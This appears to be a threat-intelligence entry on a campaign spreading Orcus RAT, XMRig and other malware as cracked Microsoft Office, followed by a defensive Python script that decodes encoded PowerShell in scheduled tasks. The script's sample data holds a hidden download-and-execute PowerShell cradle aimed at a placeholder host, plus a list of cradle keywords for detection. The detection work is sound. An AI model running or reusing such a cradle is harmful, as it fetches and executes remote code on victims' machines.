Malware (XMRig, OrcusRAT, etc.) disguised as MS Office crack
May 10, 2024, 2:25 p.m.
Description
The report details an ongoing malware campaign targeting South Korean users, which disguises malicious payloads as cracked versions of Microsoft Office and other popular software. The attackers are distributing a variety of malware, including downloaders, coin miners, remote access tools (RATs), proxies, and anti-antivirus components. These are installed persistently through scheduled tasks and utilise encoded PowerShell commands for updates. The primary malware families identified include Orcus RAT for system control, XMRig cryptominer, 3Proxy for creating a proxy network, and components to evade security products.
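The persistence and update mechanism summarised above (scheduled tasks that launch PowerShell with an encoded command) is something a defender can hunt for directly in exported task actions. The following Python is an added example, not code from the report or from the malware: it decodes the base64/UTF-16LE `-EncodedCommand` argument, notes a hidden window, and flags download-cradle keywords; the sample task actions and the URL in them are constructed placeholders, not indicators from this report.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)\s-w[a-z]*\s+hidden")  # -w / -WindowStyle hidden (T1564.003)
CRADLE_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                   "invoke-webrequest", "iwr", "net.webclient", "start-bitstransfer")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if the action has none."""
    if not re.search(r"(?i)powershell|pwsh", cmdline):
        return None
    for flag, blob in FLAG_RE.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # -ep, -ExecutionPolicy and similar are different switches
        try:  # the argument is base64 over UTF-16LE text
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None

def assess_task_action(cmdline):
    """Classify one task action: encoded PowerShell, hidden window, download-cradle keywords."""
    decoded = decode_encoded_command(cmdline)
    hits = [k for k in CRADLE_KEYWORDS if decoded and k in decoded.lower()]
    return {"encoded": decoded is not None, "hidden_window": bool(HIDDEN_RE.search(cmdline)),
            "decoded": decoded, "cradle_hits": hits}

def suspicious_actions(actions):
    """Return the actions that run encoded PowerShell containing a download cradle."""
    return [a for a in actions if assess_task_action(a)["cradle_hits"]]

def encode_ps(script):
    """Build an -EncodedCommand argument; used here only to construct the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample task actions; the URL is a placeholder, not an indicator from the report.
UPDATE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update')"
SAMPLE_TASK_ACTIONS = [
    "powershell.exe -w hidden -ep bypass -enc " + encode_ps(UPDATE_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    '"C:\\Program Files\\App\\updater.exe" /silent',
]

if __name__ == "__main__":
    for action in SAMPLE_TASK_ACTIONS:
        print(assess_task_action(action))
```

On a live host the same functions can be run over the `Actions` of `Get-ScheduledTask` output or the task XML under `C:\Windows\System32\Tasks`; only the first constructed sample is reported as suspicious.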
Date
Published: May 10, 2024, 1:45 p.m.
Created: May 10, 2024, 1:45 p.m.
Modified: May 10, 2024, 2:25 p.m.
Indicators
Attack Patterns
OrcusRAT
PureCrypter
XMRig
T1593.001
T1593.002
T1562.004
T1564.003
T1564.001
T1059.001
T1562.001
T1489
T1105